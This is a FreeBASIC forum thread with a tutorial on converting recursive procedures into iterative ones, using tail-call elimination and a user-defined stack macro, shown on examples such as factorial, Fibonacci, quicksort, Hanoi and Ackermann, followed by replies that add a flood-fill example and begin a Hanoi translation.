1\nCase (n > 0) : factorial(n) = (1) * ..... * (n - 2) * (n - 1) * (n)\nThe first line allows to determine the cumulative variable initialization: 'result = 1'\nThe second line allows to determine the statement syntax which accumulates: 'result = result * I'\n\nFull code:\n\nCode: Select all\n\n`Function iterativeFactorial (Byval n As Integer) As Integer  Dim As Integer result = 1  '' variable initialization  For I As Integer = 1 To n  '' iteration loop    result = result * I      '' iterative accumulation  Next I  Return resultEnd Function`\n2) Replace Recursion with Iteration\nWhatever the problem to be solved, there is the choice between the writing of an iterative procedure and that of a recursive procedure. If the problem has a natural recursive structure, then the recursive program is a simple adaptation of the chosen structure. This is the case of the factorial functions (seen above) for example. 
The recursive approach, however, has drawbacks: some languages ​​do not allow recursion (like the machine language!), and a recursive procedure is often expensive in memory (for execution stack) as in execution time.\n\nThese disadvantages can be overcome by transforming the recursive procedure, line by line, into an iterative procedure: it is always possible.\nReplace a recursion with an iteration allows to suppress the limitation on the number of cycles due to the execution stack size available. But for an iteration with its own storage stack, the time spent to calls to the procedures for pushing and pulling stack data is generally greater than the one for passing the parameters of a recursive procedure at each calling cycle.\n\nThe complexity of the iterative procedure obtained by such a transformation depends on the structure of the recursive procedure:\n• for some form of recursive procedure (see below the tail recursion), the transformation into an iterative procedure is very simple by means of just defining local variables corresponding to the parameters of the recursive procedure (passed arguments),\n• at opposite for other forms of recursive procedure (non-tail recursions), the use of a user storage stack in the iterative procedure is necessary to save the context, as the recursive calls do (values ​​of the passed arguments at each call):\n- when executing a recursive procedure, each recursive call leads to push the context on execution stack,\n- when the condition of stopping recursion occurs, the different contexts are progressively popped from execution stack to continue executing the procedure.\n2.1) Replace Tail Recursion with Simple Iteration\nThe recursive procedure is a tail recursive procedure if the only recursive call is at the end of the recursion and is therefore not followed by any other statement:\n- for a recursive subroutine, the only recursive call is at the end of the recursion,\n- for a recursive function, the only recursive call is at the end of the recursion and consists in taking into account the return of the function without any other additional operation on it.\nA tail recursive procedure is easy to transform into an iterative procedure.\nThe principle is that if the recursive call is the last instruction of a procedure, it is not necessary to keep on the execution stack the context of the current call, since it is not necessary to return to it:\n- it suffices to replace the parameters by their new values, and resume execution at the beginning of the procedure,\n- the recursion is thus transformed into iteration, so that there is no longer any risk of causing an overflow of the execution stack.\nSome non-tail recursive procedures can be transformed into tail recursive procedures, sometimes with a little more complex code, but even before they are subsequently transformed into iterative procedures, these tail recursive procedures often already gain in memory usage and execution time.\n\n1. 
Example with the simple \"factorial\" recursive function:\nNon-tail recursive form (already presented above):\n\nCode: Select all\n\n`Function recursiveFactorial (Byval n As Integer) As Integer  If (n = 0) Then                         '' end condition    Return 1  Else                                    '' recursion loop    Return n * recursiveFactorial(n - 1)  '' recursive call  End IfEnd Function`\nThis function has a non-tail recursive form because even though the recursive call is at the end of the function, this recursive call is not the last instruction of the function because one has to multiplied again by 'n' when 'recursiveFactorial(n - 1)' is got.\nThis calculation is done when popping context from execution stack.\n\nIt is quite easy to transform this function so that the recursion is a tail recursion.\nTo achieve this, it is necessary to add a new parameter to the function: the 'result' parameter which will serve as accumulator:\n\nCode: Select all\n\n`Function tailRecursiveFactorial (Byval n As Integer, Byval result As Integer = 1) As Integer  If (n = 0) Then                                     '' end condition    Return result  Else                                                '' recursion loop    Return tailRecursiveFactorial(n - 1, result * n)  '' tail recursive call  End IfEnd Function`\nThis time, the calculation is done when pushing context on execution stack.\n\nTail recursion is more explicit by calculating 'n - 1' and 'result * n' just before the recursive call:\n\nCode: Select all\n\n`Function explicitTailRecursiveFactorial (Byval n As Integer, Byval result As Integer = 1) As Integer  If (n = 0) Then                                     '' end condition    Return result  Else                                                '' recursion loop    result = result * n    n = n - 1    Return explicitTailRecursiveFactorial(n, result)  '' tail recursive call  End IfEnd Function`\n\nNow it is sufficient to resume execution at the beginning of the procedure by a 'Goto begin' instead of the function call, to obtain an iterative function:\n\nCode: Select all\n\n`Function translationToIterativeFactorial (Byval n As Integer, Byval result As Integer = 1) As Integer  begin:  If (n = 0) Then        '' end condition    Return result  Else                   '' iteration loop    result = result * n  '' iterative accumulation    n = n - 1    Goto begin           '' iterative jump  End IfEnd Function`\n\nFinally it is better to avoid the 'If ... Goto ... End If' instructions by using for example a 'While ... Wend' block instead, and the added 'result' parameter can be transformed into a local variable:\n\nCode: Select all\n\n`Function  betterTranslationToIterativeFactorial (Byval n As Integer) As Integer  Dim As Integer result = 1  While Not (n = 0)          '' end condition of iterative loop    result = result * n      '' iterative accumulation    n = n - 1  Wend  Return resultEnd Function`\n2. 
Similar transformation steps for the simple \"reverse string\" recursive function following:\n\nCode: Select all\n\n`Function recursiveReverse (Byval s As String) As String  If (s = \"\") Then                                   '' end condition    Return s  Else                                               '' recursion loop    Return recursiveReverse(Mid(s, 2)) & Left(s, 1)  '' recursive call  End IfEnd Function`\n\nCode: Select all\n\n`Function tailRecursiveReverse (Byval s As String, Byval cumul As String = \"\") As String  If (s = \"\") Then                                              '' end condition    Return cumul  Else                                                          '' recursion loop    Return tailRecursiveReverse(Mid(s, 2), Left(s, 1) & cumul)  '' tail recursive call  End IfEnd Function`\nNote: As the \"&\" operator (string concatenation) is not a symmetric operator ((a & b) <> (b & a), while (x * y) = (y * x) like previously), the two operand order must to be reversed when pushing context on execution stack instead of before when popping context from execution stack.\n\nCode: Select all\n\n`Function explicitTailRecursiveReverse (Byval s As String, Byval cumul As String = \"\") As String  If (s = \"\") Then                                 '' end condition    Return cumul  Else                                             '' recursion loop    cumul = Left(s, 1) & cumul    s = Mid(s, 2)    Return explicitTailRecursiveReverse(s, cumul)  '' tail recursive call  End IfEnd Function`\n\nCode: Select all\n\n`Function translationToIterativeReverse (Byval s As String, Byval cumul As String = \"\") As String  begin:  If (s = \"\") Then              '' end condition    Return cumul  Else                          '' iteration loop    cumul = Left(s, 1) & cumul  '' iterative accumulation    s = Mid(s, 2)    Goto begin                  '' iterative jump  End IfEnd Function`\n\nCode: Select all\n\n`Function betterTranslationToIterativeReverse (Byval s As String) As String  Dim As String cumul = \"\"  While Not (s = \"\")            '' end condition of iterative loop    cumul = Left(s, 1) & cumul  '' iterative accumulation    s = Mid(s, 2)  Wend  Return cumulEnd Function`\n3. 
As less simple example, the \"Fibonacci series\" non-tail recursive function:\nSometimes, the transformation to a tail recursive function is less obvious.\nThe code body of the recursive function is defined by using the recursive definition of the Fibonacci series:\nCase (n = 0) : F(0) = 0\nCase (n = 1) : F(1) = 1\nCase (n > 1) : F(n) = F(n-1) + F(n-2)\nThe first two lines allow to determine the end condition: 'If n = 0 Or n = 1 Then Return n'\nThe third line allows to determine the statement syntax which calls the function itself: 'Return F(n - 1) + F(n - 2)'\n\nNon-tail recursive form code:\n\nCode: Select all\n\n`Function recursiveFibonacci (Byval n As Uinteger) As Longint  If n = 0 Or n = 1 then                                          '' end condition    Return n  Else                                                            '' recursion loop    Return recursiveFibonacci(n - 1) + recursiveFibonacci(n - 2)  '' recursive call  End IfEnd Function`\n\nThe execution time duration for the highest values becomes no more negligible.\nIndeed, to compute F(n), there are 2^(n-1) calls: about one milliard for n=31.\n\nTry to make the recursive algorithm linear, using a recursive function which have 2 other parameters corresponding to the previous value and the last value of the series, let f(n, a, b).\nWe obtain:\nCase (n = 1): a = F(0) = 0, b = F(1) = 1\nCase (n-1): a = F(n-2), b = F(n-1)\nCase (n): F(n-1) = b, F(n) = F(n-1) + F(n-2) = a + b\n\nConsequently, for this new function f(n, a, b), the recursive call becomes f(n-1, b, a+b), and there are only (n-1) calls.\n\nTail recursive form code:\n\nCode: Select all\n\n`Function tailRecursiveFibonacci (Byval n As Uinteger, Byval a As Uinteger = 0, Byval b As Uinteger = 1) As Longint  If n <= 1 Then                                    '' end condition    Return b * n  Else                                              '' recursion loop    Return tailRecursiveFibonacci(n - 1, b, a + b)  '' tail recursive call  End IfEnd Function`\n\nThen, similar transformations as previously in order to obtain the iterative form:\n\nCode: Select all\n\n`Function explicitTailRecursiveFibonacci (Byval n As Uinteger, Byval a As Uinteger = 0, Byval b As Uinteger = 1) As Longint  If n <= 1 Then                                    '' end condition    Return b * n  Else                                              '' recursion loop    n = n - 1    Swap a, b    b = b + a    Return explicitTailRecursiveFibonacci(n, a, b)  '' tail recursive call  End IfEnd Function`\n\nCode: Select all\n\n`Function translationToIterativeFibonacci (Byval n As Uinteger, Byval a As Uinteger = 0, Byval b As Uinteger = 1) As Longint  begin:  If n <= 1 Then  '' end condition    Return b * n  Else            '' iteration loopp    n = n - 1    Swap a, b    b = b + a    Goto begin    '' iterative jump  End IfEnd Function`\n\nCode: Select all\n\n`Function betterTranslationToIterativeFibonacci (Byval n As Uinteger) As Longint  Dim As Uinteger a = 0, b = 1  While Not (n <= 1)  '' end condition of iterative loop    n = n - 1    Swap a, b    b = b + a  Wend  Return b * nEnd Function`\n2.2) Replace Non-Tail Recursion with more Complex Iteration\nThe recursive procedure is a non-tail recursive procedure if there is at least one recursive call followed by at least one instruction.\nA non-tail recursion cannot be normally transformed into a simple iteration, or it could have been transformed already into tail recursion.\n\nTo avoid limitation due to the execution stack size, a non-tail recursive algorithm can 
always (more or less easily) be replaced by an iterative algorithm, by pushing the parameters that would normally be passed to the recursive procedure onto an own storage stack. In fact, the execution stack is replaced by a user stack (less limited in size).\n\nIn the following examples, the below user stack macro (compatible with any datatype) is used:\n\nCode: Select all\n\n`'' save as file: \"DynamicUserStackTypeCreateMacro.bi\"#macro DynamicUserStackTypeCreate(typename, datatype)  Type typename    Public:      Declare Constructor ()                       '' pre-allocating user stack memory      Declare Property push (Byref i As datatype)  '' pushing on the user stack      Declare Property pop () Byref As datatype    '' popping from the user stack      Declare Property used () As Integer          '' outputting number of used elements in the user stack      Declare Property allocated () As Integer     '' outputting number of allocated elements in the user stack      Declare Destructor ()                        '' deallocating user stack memory    Private:      Dim As datatype ae (Any)  '' array of elements      Dim As Integer nue        '' number of used elements      Dim As Integer nae        '' number of allocated elements      Dim As Integer nae0       '' minimum number of allocated elements  End Type  Constructor typename ()    This.nae0 = 2^Int(Log(1024 * 1024 / Sizeof(datatype)) / Log(2) + 1) '' only a power of 2 (1 MB < stack memory < 2 MB here)    This.nue = 0    This.nae = This.nae0    Redim This.ae(This.nae - 1)                                         '' pre-allocating user stack memory  End constructor  Property typename.push (Byref i As datatype)  '' pushing on the user stack    This.nue += 1    If This.nue > This.nae0 And This.nae < This.nue * 2 Then      This.nae *= 2      Redim Preserve This.ae(This.nae - 1)  '' allocating user stack memory for double used elements at least    End If    This.ae(This.nue - 1) = i  End Property  Property typename.pop () Byref As datatype  '' popping from the user stack    If This.nue > 0 Then      Property = This.ae(This.nue - 1)      This.nue -= 1      If This.nue > This.nae0 And This.nae > This.nue * 2 Then        This.nae \\= 2        Redim Preserve This.ae(This.nae - 1)  '' allocating user stack memory for double used elements at more      End If    Else      Static As datatype d      dim As datatype d0      d = d0      Property = d      Assertwarn(This.nue > 0)  '' warning if popping while empty user stack and debug mode (-g compiler option)    End If  End Property  Property typename.used () As Integer  '' outputting number of used elements in the user stack    Property = This.nue  End property  Property typename.allocated () As Integer  '' outputting number of allocated elements in the user stack    Property = This.nae  End property  Destructor typename  '' deallocating user stack memory    This.nue = 0    This.nae = 0    Erase This.ae  '' deallocating user stack memory  End destructor#endmacro`\n\n2.2.1) Translation Quite Simple from Final Recursive Procedure (non-tail) to Iterative Procedure\nA non-tail recursive procedure is final when the recursive call(s) is(are) placed at the end of executed code (no executable instruction line after and between for several recursive calls).\n\nIn the 3 following examples, the transformation of a recursive procedure into an iterative procedure is quite simple because the recursive calls are always at the end of executed code block, and without order constraints:\n- make the procedure parameters 
(and the return value for a function) as local ones,\n- push the initial parameter values in the user stack,\n- enter in a While ... Wend loop to empty the user stack:\n- pull the variables from the user stack,\n- process the variables similarly to the recursive procedure body,\n- accumulate the \"return\" variable for a recursive function (the final value will be returned at function body end),\n- replace the recursive calls by pushing the corresponding variables on the user stack,\n1. First example (for console window): Computation of the combination coefficients nCp (binomial coefficients calculation) and display of the Pascal's triangle:\nThe first function 'recursiveCombination' is the recursive form (not a tail recursion because there are two recursive calls with summation in the last active statement).\nThe second function 'translationToIterativeCombinationStack' is the iterative form using an own stack.\n\nIn the two functions, a similar structure is conserved to enlighten the conversion method.\nFrom recursive function to iterative stacking function:\n- ahead, declaration of 1 local variable for the accumulator,\n- pushing the two initial parameters values in the user stack,\n- entering in the While ... Wend loop to empty the user stack,\n- pulling parameters from the user stack,\n- 'Return 1' is replaced by 'cumul = cumul + 1',\n- 'Return recursiveCombination(n - 1, p) + recursiveCombination(n - 1, p - 1)' is replaced by 'S.push = n - 1 : S.push = p' and 'S.push = n - 1 : S.push = p - 1'.\n\nCode: Select all\n\n`Function recursiveCombination (Byval n As Uinteger, Byval p As Uinteger) As Longint  If p = 0 Or p = n then    Return 1  Else    Return recursiveCombination(n - 1, p) + recursiveCombination(n - 1, p - 1)  End IfEnd Function'---------------------------------------------------------------------------#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForUinteger, Uinteger)Function translationToIterativeCombinationStack (Byval n As Uinteger, Byval p As Uinteger) As Longint  Dim cumul As Longint = 0  Dim As DynamicUserStackTypeForUinteger S  S.push = n : S.push = p  While S.used > 0    p = S.pop : n = S.pop    If p = 0 Or p = n then      cumul = cumul + 1    Else      S.push = n - 1 : S.push = p      S.push = n - 1 : S.push = p - 1    End If  Wend  Return cumulEnd Function'---------------------------------------------------------------------------Sub Display(Byval Combination As Function (Byval n As Uinteger, Byval p As Uinteger) As Longint, Byval n As Integer)  For I As Uinteger = 0 To n    For J As Uinteger = 0 To I      Locate , 6 * J + 3 * (n - I) + 3      Print Combination(I, J);    Next J    Print  Next IEnd Sub'---------------------------------------------------------------------------Print \" recursion:\";Display(@recursiveCombination, 12)PrintPrintPrint \" iteration with own storage stack:\";Display(@translationToIterativeCombinationStack, 12)Sleep`\n2. 
Second example (for graphics window), using a non-tail recursive subroutine (recursive drawing of circles):\nSimilar transformation steps:\n\nCode: Select all\n\n`Sub recursiveCircle (Byval x As Integer, Byval y As Integer, Byval r As Integer)  Circle (x, y), r  If r > 16 Then    recursiveCircle(x + r / 2, y, r / 2)    recursiveCircle(x - r / 2, y, r / 2)    recursiveCircle(x, y + r / 2, r / 2)    recursiveCircle(x, y - r / 2, r / 2)  End IfEnd Sub'---------------------------------------------------------------------------#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForInteger, Integer)Sub recursiveToIterativeCircleStack (Byval x As Integer, Byval y As Integer, Byval r As Integer)  Dim As DynamicUserStackTypeForInteger S  S.push = x : S.push = y : S.push = r  Do While S.used > 0    r = S.pop : y = S.pop : x = S.pop    Circle (x, y), r    If r > 16 Then      S.push = x + r / 2 : S.push = y : S.push = r / 2      S.push = x - r / 2 : S.push = y : S.push = r / 2      S.push = x : S.push = y + r / 2 : S.push = r / 2      S.push = x : S.push = y - r / 2 : S.push = r / 2    End If  LoopEnd Sub'---------------------------------------------------------------------------Screen 12Locate 2, 2Print \"recursion:\"recursiveCircle(160, 160, 150)Locate 10, 47Print \"iteration with own storage stack:\"recursiveToIterativeCircleStack(480, 320, 150)Sleep`\n3. Third example (for console window), using a non-tail recursive subroutine (Quick Sort algorithm):\nSimilar transformation steps:\n\nCode: Select all\n\n`Dim shared As Ubyte t(99)Sub recursiveQuicksort (Byval L As Integer, Byval R As Integer)  Dim As Integer pivot = L, I = L, J = R  Do    If t(I) >= t(J) then      Swap t(I), t(J)      pivot = L + R - pivot    End If    If pivot = L then      J = J - 1    Else      I = I + 1    End If  Loop Until I = J  If L < I - 1 Then    recursiveQuicksort(L, I - 1)  End If  If R > J + 1 Then    recursiveQuicksort(J + 1, R)  End IfEnd Sub#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForInteger, Integer)Sub translationToIteraticeQuicksortStack (Byval L As Integer, Byval R As Integer)  Dim As DynamicUserStackTypeForInteger S  S.push = L : S.push = R  While S.used > 0    R = S.pop : L = S.pop    Dim As Integer pivot = L, I = L, J = R    Do      If t(I) >= t(J) then        Swap t(I), t(J)        pivot = L + R - pivot      End If      If pivot = L then        J = J - 1      Else        I = I + 1      End If    Loop Until I = J    If L < I - 1 Then      S.push = L : S.push = I - 1    End If    If R > J + 1 Then      S.push = J + 1 : S.push = R    End If  WendEnd SubRandomizeFor I As Integer = Lbound(t) To Ubound(t)  t(i) = Int(Rnd * 256)Next IPrint \"raw memory:\"For K As Integer = Lbound(t) To Ubound(t)  Print Using \"####\"; t(K);Next KPrintrecursiveQuicksort(Lbound(t), Ubound(t))Print \"sorted memory by recursion:\"For K As Integer = Lbound(t) To Ubound(t)  Print Using \"####\"; t(K);Next KPrintPrintRandomizeFor I As Integer = Lbound(t) To Ubound(t)  t(i) = Int(Rnd * 256)Next IPrint \"raw memory:\"For K As Integer = Lbound(t) To Ubound(t)  Print Using \"####\"; t(K);Next KPrinttranslationToIteraticeQuicksortStack(Lbound(t), Ubound(t))Print \"sorted memory by iteration with stack:\"For K As Integer = Lbound(t) To Ubound(t)  Print Using \"####\"; t(K);Next KPrintSleep`\n2.2.2) Translation Little More Complex from Non-Final Recursive Procedure to Iterative Procedure\nFor theses examples, the transformation of the non-final 
recursive procedure into an iterative procedure is a little more complex because the recursive call(s) is(are) not placed at the end of executed code (see the \"final\" definition at paragraph 2.2.1).\n\nThe general method used hereafter is to first transform original recursive procedure into a \"final\" recursive procedure where the recursive call(s) is(are) now placed at the end of executed code block (no executable instruction line between or after).\n\n1. First example (for console window), using a non-tail recursive subroutine (tower of Hanoi algorithm):\nFor this example, the two recursive calls are at the end of executed code block but separated by an instruction line and there is an order constraint.\nIn the two functions, a similar structure is conserved to enlighten the conversion method.\nFrom recursive function to iterative stacking function:\n- the first step consists in removing the instruction line between the two recursive calls by adding its equivalent at top of the recursive code body (2 parameters are added to the procedure to pass the corresponding useful data),\n- then the process of translation to iterative form is similar to the previous examples (using a own storage stack) but reversing the order of the 2 recursive calls when pushing on the storage stack.\n\nCode: Select all\n\n`Sub recursiveHanoi (Byval n As Integer, Byval departure As String, Byval middle As String, Byval arrival As String)  If n > 0 Then    recursiveHanoi(n - 1, departure, arrival, middle)    Print \"  move one disk from \" & departure & \" to \" & arrival    recursiveHanoi(n -1 , middle, departure, arrival)  End IfEnd SubSub finalRecursiveHanoi (Byval n As Integer, Byval departure As String, Byval middle As String, Byval arrival As String, Byval dep As String = \"\", Byval arr As String = \"\")  If dep <> \"\" Then Print \"  move one disk from \" & dep & \" to \" & arr  If n > 0 Then    finalRecursiveHanoi(n - 1, departure, arrival, middle, \"\")    finalRecursiveHanoi(n - 1, middle, departure, arrival, departure, arrival)  End IfEnd Sub#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForString, String)Sub translationToIterativeHanoi (Byval n As Integer, Byval departure As String, Byval middle As String, Byval arrival As String)  Dim As String dep = \"\", arr = \"\"  Dim As DynamicUserStackTypeForString S  S.push = Str(n) : S.push = departure : S.push = middle : S.push = arrival : S.push = dep : S.push = arr  While S.used > 0    arr = S.pop : dep = S.pop : arrival = S.pop : middle = S.pop : departure = S.pop : n = Val(S.pop)    If dep <> \"\" Then Print \"  move one disk from \" & dep & \" to \" & arr    If n > 0 Then      S.push = Str(n - 1) : S.push = middle : S.push = departure : S.push = arrival : S.push = departure : S.push = arrival      S.push = Str(n - 1) : S.push = departure : S.push = arrival : S.push = middle : S.push = \"\" : S.push = \"\"    End If  WendEnd SubPrint \"recursive tower of Hanoi:\"recursiveHanoi(3, \"A\", \"B\", \"C\")PrintPrint \"final recursive tower of Hanoi:\"finalRecursiveHanoi(3, \"A\", \"B\", \"C\")PrintPrint \"iterative tower of Hanoi:\"translationToIterativeHanoi(3, \"A\", \"B\", \"C\")PrintSleep`\n2. 
Second example (for console window), using a non-tail recursive subroutine (counting-down from n, then re-counting up to n):\nFor this example, the recursive call is followed by an instruction line before the end of executed code block.\nIn the two functions, a similar structure is conserved to enlighten the conversion method.\nFrom recursive function to iterative stacking function:\n- the first step consists in replacing the instruction line at the end of executed code block by a new recursive call (a parameter is added to the procedure to pass the corresponding useful data),\n- an equivalent instruction line is added at top of the recursive code body (using the passed data), executed in this case instead of the normal code,\n- then the process of translation to iterative form is similar to the previous example (using a own storage stack) and reversing the order of the 2 recursive calls when pushing on the storage stack.\n\nCode: Select all\n\n`Sub recursiveCount (Byval n As Integer)  If n >= 0 Then    Print n & \" \";    If n = 0 Then Print    recursiveCount(n - 1)    Print n & \" \";  End IfEnd SubSub finalRecursiveCount (Byval n As Integer, Byval recount As String = \"\")  If recount <> \"\" Then    Print recount & \" \";  Else    If n >= 0 Then      Print n & \" \";      If n = 0 Then Print      finalRecursiveCount(n - 1, \"\")      finalRecursiveCount(n - 1, Str(n))    End If  End IfEnd Sub#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForString, String)Sub translationToIterativeCount (Byval n As Integer)  Dim As String recount = \"\"  Dim As DynamicUserStackTypeForString S  S.push = Str(n) : S.push = recount  While S.used > 0    recount = S.pop : n = Val(S.pop)  If recount <> \"\" Then    Print recount & \" \";  Else    If n >= 0 Then      Print n & \" \";      If n = 0 Then Print      S.push = Str(n - 1) : S.push = Str(n)      S.push = Str(n - 1) : S.push = \"\"    End If  End If  WendEnd SubPrint \"recursive counting-down then re-counting:\"recursiveCount(9)PrintPrintPrint \"final recursive counting-down then re-counting:\"finalRecursiveCount(9)PrintPrintPrint \"iterative counting-down then re-counting:\"translationToIterativeCount(9)PrintPrintSleep`\n2.2.3) Translation from Other Non-Obvious Recursive Procedure to Iterative Procedure\nTwo other cases of translation from recursion to iteration are presented here by means of simple examples:\n- for mutual recursion,\n- for nested recursion.\nTwo functions are said to be mutually recursive if the first calls the second, and in turn the second calls the first.\nA recursive function is said nested if an argument passed to the function refers to the function itself.\n\n1. 
Example using mutual recursive functions ('even()' and 'odd()' functions):\nFrom mutual recursive procedures to iterative stacking procedures (for the general case):\n- the first step consists in transforming the recursive procedures into \"final\" recursive procedures (see the \"final\" definition at paragraph 2.2.1),\n- then, the method is similar than that already described, with besides an additional parameter (an index) which is also pushed on the user stack in order to select the right code body to execute when pulling data from the stack,\n- therefore, each iterative procedure contains the translation (for stacking) of all code bodies from the recursive procedures.\nIn this following examples, the simple mutual recursive functions are here processed as in the general case (other very simple iterative solutions exist):\n\nCode: Select all\n\n`Declare Function recursiveIsEven(Byval n As Integer) As BooleanDeclare Function recursiveIsOdd(Byval n As Integer) As BooleanFunction recursiveIsEven(Byval n As Integer) As Boolean  If n = 0 Then    Return True  Else    Return recursiveIsOdd(n - 1)  End IfEnd FunctionFunction recursiveIsOdd(Byval n As Integer) As Boolean  If n = 0 Then    Return False  Else    Return recursiveIsEven(n - 1)  End IfEnd Function#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForInteger, Integer)Function iterativeIsEven(Byval n As Integer) As Boolean  Dim As Integer i = 1  Dim As DynamicUserStackTypeForInteger S  S.push = n : S.push = i  While S.used > 0    i = S.pop : n = S.pop    If i = 1 Then      If n = 0 Then        Return True      Else        S.push = n - 1 : S.push = 2      End If    Elseif i = 2 Then      If n = 0 Then        Return False      Else        S.push = n - 1 : S.push = 1      End If    End If  WendEnd FunctionFunction iterativeIsOdd(Byval n As Integer) As Boolean  Dim As Integer i = 2  Dim As DynamicUserStackTypeForInteger S  S.push = n : S.push = i  While S.used > 0    i = S.pop : n = S.pop    If i = 1 Then      If n = 0 Then        Return True      Else        S.push = n - 1 : S.push = 2      End If    Elseif i = 2 Then      If n = 0 Then        Return False      Else        S.push = n - 1 : S.push = 1      End If    End If  WendEnd FunctionPrint recursiveIsEven(16), recursiveIsOdd(16)Print recursiveIsEven(17), recursiveIsOdd(17)PrintPrint iterativeIsEven(16), iterativeIsOdd(16)Print iterativeIsEven(17), iterativeIsOdd(17)PrintSleep`\n2. 
Example using nested recursive function ('Ackermann()' function):\nFrom nested recursive function to iterative stacking function:\n- use 2 independent storage stacks, one for the first parameter \"m\" and another for the second parameter \"n\" of the function, because of the nested call on one parameter,\n- 'Return expression' is transformed into a pushing the expression on the stack dedicated to the parameter where the nesting call is,\n- therefore a 'Return' of data popping from the same stack is added at code end.\n\nCode: Select all\n\n`Function recursiveAckermann (Byval m As Integer, Byval n As Integer) As Integer  If m = 0 Then    Return n + 1  Else    If n = 0 Then      Return recursiveAckermann(m - 1, 1)    Else      Return recursiveAckermann(m - 1, recursiveAckermann(m, n - 1))    End If  End IfEnd Function#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForInteger, Integer)Function iterativeAckermann (Byval m As Integer, Byval n As Integer) As Integer  Dim As DynamicUserStackTypeForInteger Sm, Sn  Sm.push = m : Sn.push = n  While Sm.used > 0    m = Sm.pop : n = Sn.pop    If m = 0 Then      Sn.push = n + 1                                    ' Return n + 1 (and because of nested call)    Else      If n = 0 Then        Sm.push = m - 1 : Sn.push = 1                    ' Return Ackermann(m - 1, 1)      Else        Sm.push = m - 1 : Sm.push = m : Sn.push = n - 1  ' Return Ackermann(m - 1, Ackermann(m, n - 1))      End If    End If  Wend  Return Sn.pop                                          ' (because of Sn.push = n + 1)End FunctionPrint recursiveAckermann(3, 0), recursiveAckermann(3, 1), recursiveAckermann(3, 2), recursiveAckermann(3, 3), recursiveAckermann(3, 4)Print iterativeAckermann(3, 0), iterativeAckermann(3, 1), iterativeAckermann(3, 2), iterativeAckermann(3, 3), iterativeAckermann(3, 4)Sleep`\nPosts: 1461\nJoined: May 24, 2007 22:10\nLocation: The Netherlands\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nPaint, using your DynamicUserStackTypeCreateMacro.bi (not optimised for speed).\nCode updated:\n\nCode: Select all\n\n`Const As Single PI = 2 * Atan2(1,0)Const As Ulong WHITE = &h00ffffffConst As Ulong RED = &h00dd0000Const As Ulong GREEN = &h0000aa00Const As Ulong BLUE = &h000000ddSub recursivePaint(x As Long, y As Long, fillColor As Long, borderColor As Long)   If Point(x, y) = fillColor Or Point(x, y) = borderColor Then      Exit Sub   Else      Pset(x, y), fillColor      'sleep 1,1 'enable for slow animation      recursivePaint(x + 1, y, fillColor, borderColor)      recursivePaint(x, y + 1, fillColor, borderColor)      recursivePaint(x - 1, y, fillColor, borderColor)      recursivePaint(x, y - 1, fillColor, borderColor)   End IfEnd Sub#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForLong, Long)Sub recursiveToIterativePaint(x As Long, y As Long, fillColor As Long, borderColor As Long)   Dim As DynamicUserStackTypeForLong S   S.push = x : S.push = y   Do While S.used > 0      y = S.pop : x = S.pop 'pop in reverse      If Point(x, y) = fillColor Or Point(x, y) = borderColor Then         Continue Do      Else         Pset(x, y), fillColor 'add check         S.push = x + 1 : S.push = y         S.push = x : S.push = y + 1         S.push = x - 1 : S.push = y         S.push = x : S.push = y - 1      End If   LoopEnd SubScreenres 800,600,32'draw a flowerFor a As Single = 0 To PI*2 Step PI/6   Line(400 + Cos(a) * 280, 300 + 
Sin(a) * 280) - (400 + Cos(a-PI/8) * 150, 300 + Sin(a-PI/8) * 150), WHITE   Line(400 + Cos(a) * 280, 300 + Sin(a) * 280) - (400 + Cos(a+PI/8) * 150, 300 + Sin(a+PI/8) * 150), WHITE   Circle (400, 300), 140 - a * 20, WHITE, a, a + PI * 1.8NextWhile inkey\\$ = \"\"   Paint (400, 300), RED, WHITE   Sleep 200,1   recursivePaint(400, 300, BLUE, WHITE)   Sleep 200,1   recursiveToIterativePaint(400, 300, GREEN, WHITE)   Sleep 200,1Wend Print \"Done\"`\n\nUlong can be another integer. I was pushing and popping the colors also initially. This was not needed of course.\n\nI should try this on my Pentominoes solver or my Checkers / draughts computer\n\nNote: Some closing quotes (\") missing in your 'Hanoi towers'.\nLast edited by badidea on Sep 22, 2018 21:54, edited 2 times in total.\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, FRANCE\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nbadidea wrote:Note: Some closing quotes (\") missing in your 'Hanoi towers'.\nThanks (corrected now).\n\nbadidea wrote:Paint, using your DynamicUserStackTypeCreateMacro.bi (not optimised for speed)\nIn your code, you do not have to define local variables 'xs' and 'ys' because the variables 'x' and 'y' are passed by value.\nPosts: 1461\nJoined: May 24, 2007 22:10\nLocation: The Netherlands\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nfxm wrote:In your code, you do not have to define local variables 'xs' and 'ys' because the variables 'x' and 'y' are passed by value.\nCode updated.\npaul doe\nPosts: 919\nJoined: Jul 25, 2017 17:22\nLocation: Argentina\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nReally nice and comprehensive work, fxm. Well done!\ndodicat\nPosts: 5913\nJoined: Jan 10, 2006 20:30\nLocation: Scotland\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nThanks fxm\nPowerbasic had a recursive hanoi.\nHere is a translation.\n\nCode: Select all\n\n` '============================================================================='  This  program demostrates a recursive version of the popular \"Towers'  of Hanoi\" game.''  In order to run this program do the following:                           ³'    1. Load PowerBASIC by typing PB at the DOS prompt.'    2. Load the file HANOI.BAS from the Load option of the File'       pulldown menu.'    3. 
